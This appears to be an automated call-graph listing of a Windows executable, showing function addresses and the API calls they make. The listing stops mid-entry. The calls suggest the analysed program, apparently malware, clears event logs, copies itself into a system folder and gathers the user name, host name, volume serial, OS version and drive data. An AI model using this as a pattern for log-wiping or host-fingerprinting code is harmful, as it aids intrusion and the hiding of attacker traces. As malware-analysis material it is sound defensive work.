7ff670fc4530 9 API calls 4533->4535 4536 7ff670fc436d GetModuleFileNameW GetFileAttributesW SetFileAttributesW 4534->4536 4537 7ff670fc435c RemoveMenu 4534->4537 4538 7ff670fc44f1 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4535->4538 4539 7ff670fc44d5 4536->4539 4550 7ff670fc43b1 4536->4550 4537->4536 4538->4539 4540 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4539->4540 4542 7ff670fc4513 4540->4542 4541 7ff670fc43d0 GdiplusStartup 4565 7ff670fc47d0 GetModuleFileNameW SHGetKnownFolderPath 4541->4565 4553 7ff670fce474 GetModuleHandleW 4542->4553 4544 7ff670fc43ff 4584 7ff670fc4990 6 API calls 4544->4584 4647 7ff670fc7e10 4544->4647 4548 7ff670fc4442 OpenEventLogW 4549 7ff670fc4455 ClearEventLogW CloseEventLog 4548->4549 4548->4550 4549->4550 4550->4539 4550->4541 4550->4548 4552 7ff670fc44d7 _invalid_parameter_noinfo_noreturn 4550->4552 4718 7ff670fcda34 4550->4718 4552->4533 4554 7ff670fcdd2f 4553->4554 4554->4515 4554->4525 4556 7ff670fce34a 4555->4556 4557 7ff670fce358 memset RtlCaptureContext RtlLookupFunctionEntry 4556->4557 4558 7ff670fce392 RtlVirtualUnwind 4557->4558 4559 7ff670fce3ce memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4557->4559 4558->4559 4560 7ff670fce44e 4559->4560 4560->4513 4562 7ff670fc3eb0 4561->4562 4563 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4562->4563 4564 7ff670fc423d 4563->4564 4564->4531 4564->4532 4721 7ff670fc5210 4565->4721 4568 7ff670fc4890 4740 7ff670fc5350 4568->4740 4569 7ff670fc485f memmove 4572 7ff670fc48a6 4569->4572 4573 7ff670fc491a CoTaskMemFree 4572->4573 4576 7ff670fc4915 4572->4576 4580 7ff670fc490e _invalid_parameter_noinfo_noreturn 4572->4580 4574 7ff670fc492f 4573->4574 4575 7ff670fc4932 GetFileAttributesW 4573->4575 4574->4575 4578 7ff670fc4958 4575->4578 4579 7ff670fc493d CopyFileW 4575->4579 4577 7ff670fcda34 _Receive_impl free 4576->4577 4577->4573 4582 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4578->4582 4579->4578 4580->4576 4583 7ff670fc496b 4582->4583 4583->4544 4585 7ff670fc4ad7 VariantClear VariantClear VariantClear VariantClear 4584->4585 4586 7ff670fcd9f0 4 API calls 4585->4586 4587 7ff670fc4b1c 4586->4587 4588 7ff670fc4b29 SysAllocString 4587->4588 4589 7ff670fc4b59 4587->4589 4588->4589 4599 7ff670fc51a9 4588->4599 4590 7ff670fc4bbb 4589->4590 4591 7ff670fc4b93 SysFreeString 4589->4591 4592 7ff670fc4b9c 4589->4592 4589->4599 4593 7ff670fcd9f0 4 API calls 4590->4593 4591->4592 4594 7ff670fc4baa 4592->4594 4596 7ff670fcda34 _Receive_impl free 4592->4596 4595 7ff670fc4bd7 4593->4595 4597 7ff670fcda34 _Receive_impl free 4594->4597 4598 7ff670fc4be4 SysAllocString 4595->4598 4600 7ff670fc4c14 4595->4600 4596->4594 4597->4590 4598->4599 4598->4600 4600->4599 4601 7ff670fc4c77 4600->4601 4602 7ff670fc4c4f SysFreeString 4600->4602 4603 7ff670fc4c58 4600->4603 4604 7ff670fc4cd6 4601->4604 4606 7ff670fc4c88 CoUninitialize 4601->4606 4602->4603 4605 7ff670fc4c66 4603->4605 4607 7ff670fcda34 _Receive_impl free 4603->4607 4609 7ff670fcd9f0 4 API calls 4604->4609 4608 7ff670fcda34 _Receive_impl free 4605->4608 4613 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4606->4613 4607->4605 4608->4601 4610 7ff670fc4d11 4609->4610 4612 7ff670fc4d1e SysAllocString 4610->4612 4615 7ff670fc4d4e 4610->4615 4612->4599 4612->4615 4614 7ff670fc4cb9 4613->4614 4614->4544 4615->4599 4616 7ff670fc4d80 SysFreeString 4615->4616 4617 7ff670fc4d89 4615->4617 4621 7ff670fc4da8 4615->4621 4616->4617 4618 7ff670fc4d97 4617->4618 4619 7ff670fcda34 _Receive_impl free 4617->4619 4620 7ff670fcda34 _Receive_impl free 4618->4620 4619->4618 4620->4621 4622 7ff670fcd9f0 4 API calls 4621->4622 4623 7ff670fc4ef5 4622->4623 4624 7ff670fc4f02 SysAllocString 4623->4624 4626 7ff670fc4f2a 4623->4626 4624->4626 4625 7ff670fc4f90 SysAllocString 4625->4599 4633 7ff670fc4fe2 VariantInit VariantInit 4625->4633 4626->4599 4626->4625 4627 7ff670fc4f71 4626->4627 4628 7ff670fc4f68 SysFreeString 4626->4628 4629 7ff670fc4f7f 4627->4629 4630 7ff670fcda34 _Receive_impl free 4627->4630 4628->4627 4631 7ff670fcda34 _Receive_impl free 4629->4631 4630->4629 4631->4625 4634 7ff670fcd9f0 4 API calls 4633->4634 4635 7ff670fc5040 4634->4635 4636 7ff670fc504c SysAllocString 4635->4636 4637 7ff670fc507c 4635->4637 4636->4599 4636->4637 4637->4599 4638 7ff670fc5148 VariantClear VariantClear VariantClear 4637->4638 4639 7ff670fc511f SysFreeString 4637->4639 4640 7ff670fc5128 4637->4640 4642 7ff670fc5175 CoUninitialize 4638->4642 4639->4640 4641 7ff670fc5136 4640->4641 4643 7ff670fcda34 _Receive_impl free 4640->4643 4644 7ff670fcda34 _Receive_impl free 4641->4644 4642->4599 4643->4641 4645 7ff670fc5147 4644->4645 4645->4638 4648 7ff670fc7e28 4647->4648 4649 7ff670fc83b8 4648->4649 4779 7ff670fc34a0 4648->4779 4650 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4649->4650 4652 7ff670fc4417 CoUninitialize 4650->4652 4652->4550 4653 7ff670fc7e84 GetUserNameW 4796 7ff670fc21a0 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 4653->4796 4660 7ff670fc34a0 8 API calls 4661 7ff670fc7f15 GetComputerNameW 4660->4661 4662 7ff670fc21a0 10 API calls 4661->4662 4663 7ff670fc7f40 4662->4663 4664 7ff670fc2cc0 42 API calls 4663->4664 4665 7ff670fc7f70 4664->4665 4666 7ff670fc20b0 _Receive_impl 2 API calls 4665->4666 4667 7ff670fc7f7d 4666->4667 4668 7ff670fc34a0 8 API calls 4667->4668 4669 7ff670fc7fa6 4668->4669 4840 7ff670fc1450 4669->4840 4672 7ff670fc34a0 8 API calls 4673 7ff670fc7fd9 GetVolumeInformationW 4672->4673 4674 7ff670fc808e 4673->4674 4675 7ff670fc8029 4673->4675 4676 7ff670fc34a0 8 API calls 4674->4676 5104 7ff670fc3280 4675->5104 4678 7ff670fc808c 4676->4678 4680 7ff670fc34a0 8 API calls 4678->4680 4679 7ff670fc8043 4681 7ff670fc21a0 10 API calls 4679->4681 4682 7ff670fc80dc memset GetVersionExW 4680->4682 4683 7ff670fc804f 4681->4683 4684 7ff670fc8113 GetModuleHandleW GetProcAddress 4682->4684 4685 7ff670fc810c 4682->4685 4688 7ff670fc2cc0 42 API calls 4683->4688 4686 7ff670fc8135 4684->4686 4687 7ff670fc8139 4684->4687 4690 7ff670fc81e3 4685->4690 4691 7ff670fc8195 4685->4691 4686->4685 5107 7ff670fc1390 4687->5107 4689 7ff670fc807f 4688->4689 4693 7ff670fc20b0 _Receive_impl 2 API calls 4689->4693 4692 7ff670fc34a0 8 API calls 4690->4692 4694 7ff670fc21a0 10 API calls 4691->4694 4696 7ff670fc81e1 4692->4696 4693->4678 4695 7ff670fc81a1 4694->4695 4699 7ff670fc2cc0 42 API calls 4695->4699 4698 7ff670fc34a0 8 API calls 4696->4698 4700 7ff670fc8249 4698->4700 4701 7ff670fc81d4 4699->4701 4866 7ff670fc1780 4700->4866 4703 7ff670fc20b0 _Receive_impl 2 API calls 4701->4703 4703->4696 4706 7ff670fc828f 4707 7ff670fc34a0 8 API calls 4706->4707 4708 7ff670fc82da 4707->4708 4912 7ff670fc70a0 4708->4912 4710 7ff670fc8342 4711 7ff670fc8395 4710->4711 4714 7ff670fc8390 4710->4714 4716 7ff670fc8389 _invalid_parameter_noinfo_noreturn 4710->4716 5111 7ff670fc9ea0 4711->5111 4713 7ff670fc82ed 4713->4710 4713->4716 4717 7ff670fcda34 _Receive_impl free 4713->4717 4715 7ff670fcda34 _Receive_impl free 4714->4715 4715->4711 4716->4714 4717->4710 4719 7ff670fce935 free 4718->4719 4720 7ff670fcda2c 4718->4720 4720->4719 4722 7ff670fc5240 4721->4722 4722->4722 4723 7ff670fc5344 4722->4723 4724 7ff670fc525d 4722->4724 4770 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 4723->4770 4725 7ff670fc5268 memmove 4724->4725 4729 7ff670fc5289 4724->4729 4727 7ff670fc4848 4725->4727 4727->4568 4727->4569 4728 7ff670fc5349 4771 7ff670fc1120 4728->4771 4729->4728 4730 7ff670fc52c6 memmove 4729->4730 4731 7ff670fc5307 4729->4731 4735 7ff670fc52b9 4729->4735 4730->4727 4734 7ff670fcd9f0 4 API calls 4731->4734 4734->4730 4760 7ff670fcd9f0 4735->4760 4736 7ff670fc534f 4739 7ff670fc5300 _invalid_parameter_noinfo_noreturn 4739->4731 4741 7ff670fc5504 4740->4741 4744 7ff670fc5383 4740->4744 4778 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 4741->4778 4743 7ff670fc5509 4747 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 4743->4747 4744->4743 4745 7ff670fc5431 4744->4745 4746 7ff670fc5405 4744->4746 4754 7ff670fc53e9 4744->4754 4748 7ff670fcd9f0 4 API calls 4745->4748 4746->4743 4749 7ff670fc5412 4746->4749 4750 7ff670fc550f 4747->4750 4748->4754 4751 7ff670fcd9f0 4 API calls 4749->4751 4751->4754 4752 7ff670fc54bf memmove memmove 4757 7ff670fc54b6 4752->4757 4753 7ff670fc5462 memmove memmove 4755 7ff670fc54ab 4753->4755 4756 7ff670fc5496 4753->4756 4754->4752 4754->4753 4758 7ff670fc54b8 _invalid_parameter_noinfo_noreturn 4754->4758 4759 7ff670fcda34 _Receive_impl free 4755->4759 4756->4755 4756->4758 4757->4572 4758->4752 4759->4757 4761 7ff670fcda0a malloc 4760->4761 4762 7ff670fc52c1 4761->4762 4763 7ff670fcd9fb 4761->4763 4762->4730 4762->4739 4763->4761 4764 7ff670fcda1a 4763->4764 4765 7ff670fcda25 4764->4765 4774 7ff670fce1ec 4764->4774 4767 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 4765->4767 4768 7ff670fcda2b free 4767->4768 4772 7ff670fc112e Concurrency::cancel_current_task 4771->4772 4773 7ff670fc113f __std_exception_copy 4772->4773 4773->4736 4777 7ff670fce1cc 4774->4777 4776 7ff670fce1fa _CxxThrowException 4777->4776 4780 7ff670fc3591 4779->4780 4781 7ff670fc34c6 4779->4781 5121 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 4780->5121 4783 7ff670fc34ec 4781->4783 4784 7ff670fc34cc memmove 4781->4784 4785 7ff670fc3596 4783->4785 4789 7ff670fc355d 4783->4789 4792 7ff670fc34fd 4783->4792 4794 7ff670fc3518 memmove 4783->4794 4784->4653 4787 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 4785->4787 4786 7ff670fcd9f0 4 API calls 4790 7ff670fc3513 4786->4790 4791 7ff670fc359c 4787->4791 4793 7ff670fcd9f0 4 API calls 4789->4793 4790->4794 4795 7ff670fc3556 _invalid_parameter_noinfo_noreturn 4790->4795 4792->4786 4793->4794 4794->4653 4795->4789 4797 7ff670fcd9f0 4 API calls 4796->4797 4798 7ff670fc2209 ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 4797->4798 4799 7ff670fc2274 4798->4799 4800 7ff670fc2cc0 4799->4800 4817 7ff670fc2d2e 4800->4817 4801 7ff670fc3040 4803 7ff670fc2f84 4801->4803 4805 7ff670fc2f7f 4801->4805 4808 7ff670fc3089 _invalid_parameter_noinfo_noreturn 4801->4808 4802 7ff670fc2d60 ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD 4802->4817 4804 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4803->4804 4807 7ff670fc2f93 4804->4807 4806 7ff670fcda34 _Receive_impl free 4805->4806 4806->4803 4832 7ff670fc20b0 4807->4832 4811 7ff670fc3090 4808->4811 4809 7ff670fc2fa7 4809->4811 4820 7ff670fc2a40 13 API calls 4809->4820 4810 7ff670fc2ef8 4813 7ff670fc3095 4810->4813 5185 7ff670fc2a40 4810->5185 5207 7ff670fc12c0 4811->5207 4812 7ff670fc2e2c memmove 4812->4817 4816 7ff670fc12c0 Concurrency::cancel_current_task 11 API calls 4813->4816 4821 7ff670fc309b 4816->4821 4817->4801 4817->4802 4817->4809 4817->4810 4817->4812 5122 7ff670fc35a0 4817->5122 5142 7ff670fc38c0 4817->5142 5165 7ff670fc3710 4817->5165 4824 7ff670fc2fbe 4820->4824 4823 7ff670fc2f0f 4825 7ff670fc2f48 4823->4825 4826 7ff670fc2f43 4823->4826 4829 7ff670fc2fee _invalid_parameter_noinfo_noreturn 4823->4829 4824->4825 4827 7ff670fc2ff5 4824->4827 4824->4829 4825->4803 4825->4805 4831 7ff670fc3039 _invalid_parameter_noinfo_noreturn 4825->4831 4828 7ff670fcda34 _Receive_impl free 4826->4828 4830 7ff670fcda34 _Receive_impl free 4827->4830 4828->4825 4829->4827 4830->4825 4831->4801 4833 7ff670fc20d1 4832->4833 4834 7ff670fc2107 4832->4834 4835 7ff670fc218d _invalid_parameter_noinfo_noreturn 4833->4835 4836 7ff670fcda34 _Receive_impl free 4833->4836 4834->4835 4837 7ff670fc2150 4834->4837 4838 7ff670fc2148 4834->4838 4836->4834 4837->4660 4839 7ff670fcda34 _Receive_impl free 4838->4839 4839->4837 4841 7ff670fc34a0 8 API calls 4840->4841 4842 7ff670fc14b3 4841->4842 4843 7ff670fc1556 4842->4843 4847 7ff670fc14d3 memmove memmove memmove 4842->4847 5233 7ff670fc3c80 4843->5233 4846 7ff670fc1568 4848 7ff670fc15d7 _popen 4846->4848 4849 7ff670fc15d2 4846->4849 4854 7ff670fc15cb _invalid_parameter_noinfo_noreturn 4846->4854 4847->4846 4850 7ff670fc16a0 fgets 4848->4850 4851 7ff670fc1616 4848->4851 4855 7ff670fcda34 _Receive_impl free 4849->4855 4853 7ff670fc170e _pclose 4850->4853 4863 7ff670fc16c4 4850->4863 4852 7ff670fc34a0 8 API calls 4851->4852 4857 7ff670fc1633 4852->4857 4856 7ff670fc1670 4853->4856 4853->4857 4854->4849 4855->4848 4859 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4856->4859 4857->4856 4858 7ff670fc166b 4857->4858 4860 7ff670fc1776 _invalid_parameter_noinfo_noreturn 4857->4860 4861 7ff670fcda34 _Receive_impl free 4858->4861 4862 7ff670fc167f 4859->4862 4861->4856 4862->4672 5227 7ff670fc3200 4863->5227 4865 7ff670fc16f7 fgets 4865->4853 4865->4863 4867 7ff670fc34a0 8 API calls 4866->4867 4868 7ff670fc17e0 GetLogicalDriveStringsA 4867->4868 4869 7ff670fc1bc2 4868->4869 4870 7ff670fc1802 4868->4870 4872 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4869->4872 4870->4869 4871 7ff670fc180d memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 4870->4871 4876 7ff670fc1a75 4871->4876 4890 7ff670fc18ba 4871->4890 4873 7ff670fc1bd4 4872->4873 4894 7ff670fc85b0 4873->4894 4874 7ff670fc34a0 8 API calls 4875 7ff670fc18e3 GetDriveTypeA 4874->4875 4875->4890 4877 7ff670fc1b07 4876->4877 4879 7ff670fc30a0 9 API calls 4876->4879 4878 7ff670fc1b42 4877->4878 4882 7ff670fc30a0 9 API calls 4877->4882 4880 7ff670fc1b83 4878->4880 4883 7ff670fc1b7e 4878->4883 4885 7ff670fc1b77 _invalid_parameter_noinfo_noreturn 4878->4885 4879->4877 4884 7ff670fc2870 _Receive_impl 4 API calls 4880->4884 4882->4878 4886 7ff670fcda34 _Receive_impl free 4883->4886 4887 7ff670fc1bae ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 4884->4887 4885->4883 4886->4880 4887->4869 4888 7ff670fc3ac0 9 API calls 4888->4890 4889 7ff670fc1a67 _invalid_parameter_noinfo_noreturn 4891 7ff670fc1a6e _invalid_parameter_noinfo_noreturn 4889->4891 4890->4874 4890->4876 4890->4888 4890->4889 4890->4891 4892 7ff670fcda34 free _Receive_impl 4890->4892 5254 7ff670fc30a0 4890->5254 5274 7ff670fc32e0 4890->5274 4891->4876 4892->4890 4895 7ff670fc86e7 4894->4895 4900 7ff670fc860f 4894->4900 4896 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4895->4896 4898 7ff670fc86fb 4896->4898 4897 7ff670fc8715 5290 7ff670fcaec0 ?_Xlength_error@std@@YAXPEBD 4897->5290 4898->4706 4900->4897 4901 7ff670fc8668 4900->4901 4903 7ff670fc8710 4900->4903 4904 7ff670fc8649 4900->4904 4908 7ff670fc8653 4900->4908 4905 7ff670fcd9f0 4 API calls 4901->4905 4907 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 4903->4907 4906 7ff670fcd9f0 4 API calls 4904->4906 4905->4908 4909 7ff670fc864e 4906->4909 4907->4897 4908->4895 4911 7ff670fc2a40 13 API calls 4908->4911 4909->4908 4910 7ff670fc8661 _invalid_parameter_noinfo_noreturn 4909->4910 4910->4901 4911->4908 4913 7ff670fc34a0 8 API calls 4912->4913 4914 7ff670fc7108 4913->4914 5291 7ff670fc6000 4914->5291 4917 7ff670fc715c 5314 7ff670fca640 4917->5314 4918 7ff670fc7157 4921 7ff670fcda34 _Receive_impl free 4918->4921 4920 7ff670fc7150 _invalid_parameter_noinfo_noreturn 4920->4918 4921->4917 4923 7ff670fcd9f0 4 API calls 4924 7ff670fc71b2 4923->4924 4925 7ff670fc34a0 8 API calls 4924->4925 4926 7ff670fc71f0 4925->4926 5355 7ff670fc6440 4926->5355 4930 7ff670fc7266 4931 7ff670fc8e00 55 API calls 4930->4931 4932 7ff670fc72cc 4931->4932 4933 7ff670fc8e00 55 API calls 4932->4933 4934 7ff670fc7317 4933->4934 4935 7ff670fca640 20 API calls 4934->4935 4936 7ff670fc7366 4935->4936 4937 7ff670fca640 20 API calls 4936->4937 4938 7ff670fc7396 6 API calls 4937->4938 4939 7ff670fc74b0 4938->4939 4939->4939 5475 7ff670fcb100 4939->5475 4942 7ff670fc759b 4944 7ff670fca640 20 API calls 4942->4944 4943 7ff670fc30a0 9 API calls 4943->4942 4945 7ff670fc75bf 4944->4945 4946 7ff670fcd9f0 4 API calls 4945->4946 4947 7ff670fc75ce 4946->4947 4948 7ff670fc34a0 8 API calls 4947->4948 4949 7ff670fc7613 4948->4949 5502 7ff670fcc6e0 4949->5502 4952 7ff670fc763a 4953 7ff670fc7db4 4952->4953 4954 7ff670fc7652 4952->4954 5586 7ff670fcb3b0 4953->5586 4956 7ff670fc7685 4954->4956 4957 7ff670fc7687 4954->4957 4958 7ff670fc767d 4954->4958 4955 7ff670fcd9f0 4 API calls 4955->4952 4959 7ff670fc34a0 8 API calls 4956->4959 4957->4956 5579 7ff670fc9f80 4957->5579 5571 7ff670fccb90 4958->5571 4962 7ff670fc76dd 4959->4962 4964 7ff670fcc6e0 50 API calls 4962->4964 4967 7ff670fc76ea 4964->4967 4968 7ff670fca640 20 API calls 4967->4968 4970 7ff670fc771a 4968->4970 5527 7ff670fc8ae0 memset 4970->5527 4971 7ff670fc7dfb 5622 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 4971->5622 4974 7ff670fc7e00 4975 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 4974->4975 4981 7ff670fc7e05 4975->4981 4976 7ff670fc7875 4976->4971 4987 7ff670fc788f 4976->4987 4977 7ff670fc7946 memmove 4980 7ff670fc3200 13 API calls 4977->4980 4978 7ff670fc7730 4978->4976 4982 7ff670fc3200 13 API calls 4978->4982 4983 7ff670fc35a0 9 API calls 4978->4983 4979 7ff670fc78d4 4989 7ff670fcd9f0 4 API calls 4979->4989 4984 7ff670fc79ae 4980->4984 4985 7ff670fc83b8 4981->4985 4991 7ff670fc34a0 8 API calls 4981->4991 4982->4978 4983->4978 4990 7ff670fc3200 13 API calls 4984->4990 4988 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4985->4988 4986 7ff670fc78f2 4986->4977 4987->4974 4987->4977 4987->4979 4987->4986 4992 7ff670fc7939 4987->4992 4994 7ff670fc83c7 4988->4994 4995 7ff670fc78ed 4989->4995 5000 7ff670fc7a0b 4990->5000 4996 7ff670fc7e84 GetUserNameW 4991->4996 4993 7ff670fcd9f0 4 API calls 4992->4993 4993->4986 4994->4713 4995->4986 4997 7ff670fc7932 _invalid_parameter_noinfo_noreturn 4995->4997 4998 7ff670fc21a0 10 API calls 4996->4998 4997->4992 5001 7ff670fc7eaf 4998->5001 4999 7ff670fc7a86 5007 7ff670fcda34 _Receive_impl free 4999->5007 5000->4999 5002 7ff670fc7a8b 5000->5002 5006 7ff670fc7a7f _invalid_parameter_noinfo_noreturn 5000->5006 5009 7ff670fc2cc0 42 API calls 5001->5009 5003 7ff670fc7ad6 5002->5003 5004 7ff670fc7ad1 5002->5004 5008 7ff670fc7aca _invalid_parameter_noinfo_noreturn 5002->5008 5541 7ff670fc61c0 CreatePipe 5003->5541 5010 7ff670fcda34 _Receive_impl free 5004->5010 5006->4999 5007->5002 5008->5004 5012 7ff670fc7edf 5009->5012 5010->5003 5014 7ff670fc20b0 _Receive_impl 2 API calls 5012->5014 5013 7ff670fc4530 9 API calls 5015 7ff670fc7b1c 5013->5015 5016 7ff670fc7eec 5014->5016 5557 7ff670fc3ac0 5015->5557 5018 7ff670fc34a0 8 API calls 5016->5018 5020 7ff670fc7f15 GetComputerNameW 5018->5020 5024 7ff670fc21a0 10 API calls 5020->5024 5021 7ff670fc7b65 5025 7ff670fc7b98 5021->5025 5029 7ff670fc7b91 _invalid_parameter_noinfo_noreturn 5021->5029 5022 7ff670fc7b9d 5023 7ff670fc7bff 5022->5023 5026 7ff670fc7bfa 5022->5026 5031 7ff670fc7bf3 _invalid_parameter_noinfo_noreturn 5022->5031 5027 7ff670fc7c56 5023->5027 5033 7ff670fc7c51 5023->5033 5036 7ff670fc7c4a _invalid_parameter_noinfo_noreturn 5023->5036 5028 7ff670fc7f40 5024->5028 5030 7ff670fcda34 _Receive_impl free 5025->5030 5032 7ff670fcda34 _Receive_impl free 5026->5032 5034 7ff670fc7cb8 5027->5034 5039 7ff670fc7cb3 5027->5039 5043 7ff670fc7cac _invalid_parameter_noinfo_noreturn 5027->5043 5038 7ff670fc2cc0 42 API calls 5028->5038 5029->5025 5030->5022 5031->5026 5032->5023 5037 7ff670fcda34 _Receive_impl free 5033->5037 5035 7ff670fc2870 _Receive_impl 4 API calls 5034->5035 5041 7ff670fc7d03 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5035->5041 5036->5033 5037->5027 5042 7ff670fc7f70 5038->5042 5040 7ff670fcda34 _Receive_impl free 5039->5040 5040->5034 5044 7ff670fca640 20 API calls 5041->5044 5045 7ff670fc20b0 _Receive_impl 2 API calls 5042->5045 5043->5039 5046 7ff670fc7d35 5044->5046 5047 7ff670fc7f7d 5045->5047 5048 7ff670fc7d7c 5046->5048 5051 7ff670fc7d77 5046->5051 5054 7ff670fc7d70 _invalid_parameter_noinfo_noreturn 5046->5054 5049 7ff670fc34a0 8 API calls 5047->5049 5052 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5048->5052 5050 7ff670fc7fa6 5049->5050 5053 7ff670fc1450 38 API calls 5050->5053 5055 7ff670fcda34 _Receive_impl free 5051->5055 5056 7ff670fc7d8d 5052->5056 5057 7ff670fc7fb0 5053->5057 5054->5051 5055->5048 5056->4713 5058 7ff670fc34a0 8 API calls 5057->5058 5059 7ff670fc7fd9 GetVolumeInformationW 5058->5059 5060 7ff670fc808e 5059->5060 5061 7ff670fc8029 5059->5061 5062 7ff670fc34a0 8 API calls 5060->5062 5063 7ff670fc3280 __stdio_common_vswprintf_s 5061->5063 5064 7ff670fc808c 5062->5064 5065 7ff670fc8043 5063->5065 5066 7ff670fc34a0 8 API calls 5064->5066 5067 7ff670fc21a0 10 API calls 5065->5067 5068 7ff670fc80dc memset GetVersionExW 5066->5068 5069 7ff670fc804f 5067->5069 5070 7ff670fc8113 GetModuleHandleW GetProcAddress 5068->5070 5071 7ff670fc810c 5068->5071 5074 7ff670fc2cc0 42 API calls 5069->5074 5072 7ff670fc8135 5070->5072 5073 7ff670fc8139 5070->5073 5076 7ff670fc81e3 5071->5076 5077 7ff670fc8195 5071->5077 5072->5071 5083 7ff670fc1390 __stdio_common_vswprintf 5073->5083 5075 7ff670fc807f 5074->5075 5079 7ff670fc20b0 _Receive_impl 2 API calls 5075->5079 5078 7ff670fc34a0 8 API calls 5076->5078 5080 7ff670fc21a0 10 API calls 5077->5080 5082 7ff670fc81e1 5078->5082 5079->5064 5081 7ff670fc81a1 5080->5081 5085 7ff670fc2cc0 42 API calls 5081->5085 5084 7ff670fc34a0 8 API calls 5082->5084 5083->5072 5086 7ff670fc8249 5084->5086 5087 7ff670fc81d4 5085->5087 5088 7ff670fc1780 52 API calls 5086->5088 5089 7ff670fc20b0 _Receive_impl 2 API calls 5087->5089 5090 7ff670fc8256 5088->5090 5089->5082 5091 7ff670fc85b0 23 API calls 5090->5091 5092 7ff670fc828f 5091->5092 5093 7ff670fc34a0 8 API calls 5092->5093 5094 7ff670fc82da 5093->5094 5095 7ff670fc70a0 204 API calls 5094->5095 5099 7ff670fc82ed 5095->5099 5096 7ff670fc8342 5097 7ff670fc8395 5096->5097 5100 7ff670fc8390 5096->5100 5102 7ff670fc8389 _invalid_parameter_noinfo_noreturn 5096->5102 5098 7ff670fc9ea0 24 API calls 5097->5098 5098->4985 5099->5096 5099->5102 5103 7ff670fcda34 _Receive_impl free 5099->5103 5101 7ff670fcda34 _Receive_impl free 5100->5101 5101->5097 5102->5100 5103->5096 5895 7ff670fc1010 5104->5895 5106 7ff670fc32a6 __stdio_common_vswprintf_s 5106->4679 5108 7ff670fc13ce 5107->5108 5109 7ff670fc13b3 5107->5109 5110 7ff670fc13e8 __stdio_common_vswprintf 5108->5110 5109->4686 5110->5109 5115 7ff670fc9eb9 5111->5115 5118 7ff670fc9f33 5111->5118 5112 7ff670fc9ed8 5114 7ff670fc9f28 5112->5114 5116 7ff670fc9f4b _invalid_parameter_noinfo_noreturn 5112->5116 5117 7ff670fcda34 _Receive_impl free 5114->5117 5115->5112 5896 7ff670fc83e0 5115->5896 5119 7ff670fca640 20 API calls 5116->5119 5117->5118 5118->4649 5120 7ff670fc9f70 5119->5120 5120->4649 5123 7ff670fc36f9 5122->5123 5127 7ff670fc35d0 5122->5127 5210 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5123->5210 5125 7ff670fc36fe 5128 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5125->5128 5126 7ff670fcd9f0 4 API calls 5129 7ff670fc361b 5126->5129 5127->5129 5130 7ff670fc3660 5127->5130 5131 7ff670fc3628 5127->5131 5137 7ff670fc3635 5127->5137 5134 7ff670fc3704 5128->5134 5132 7ff670fc36c0 _invalid_parameter_noinfo_noreturn 5129->5132 5135 7ff670fc36c7 memmove 5129->5135 5136 7ff670fc367c memmove 5129->5136 5133 7ff670fcd9f0 4 API calls 5130->5133 5131->5125 5131->5137 5132->5135 5133->5129 5140 7ff670fc36be 5135->5140 5138 7ff670fc369e 5136->5138 5139 7ff670fc36b3 5136->5139 5137->5126 5138->5132 5138->5139 5141 7ff670fcda34 _Receive_impl free 5139->5141 5140->4817 5141->5140 5143 7ff670fc3a39 5142->5143 5147 7ff670fc38f8 5142->5147 5211 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5143->5211 5145 7ff670fc395d 5148 7ff670fcd9f0 4 API calls 5145->5148 5146 7ff670fc3a3e 5150 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5146->5150 5147->5145 5149 7ff670fc3943 5147->5149 5151 7ff670fc3950 5147->5151 5152 7ff670fc3988 5147->5152 5148->5149 5153 7ff670fc39f5 _invalid_parameter_noinfo_noreturn 5149->5153 5156 7ff670fc39a8 memmove memmove 5149->5156 5157 7ff670fc39fc 5149->5157 5155 7ff670fc3a44 ?uncaught_exceptions@std@ 5150->5155 5151->5145 5151->5146 5154 7ff670fcd9f0 4 API calls 5152->5154 5153->5157 5154->5149 5158 7ff670fc3a63 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5155->5158 5159 7ff670fc3a6d 5155->5159 5160 7ff670fc39d3 5156->5160 5161 7ff670fc39e8 5156->5161 5163 7ff670fc3a04 memmove 5157->5163 5158->5159 5159->4817 5160->5153 5160->5161 5162 7ff670fcda34 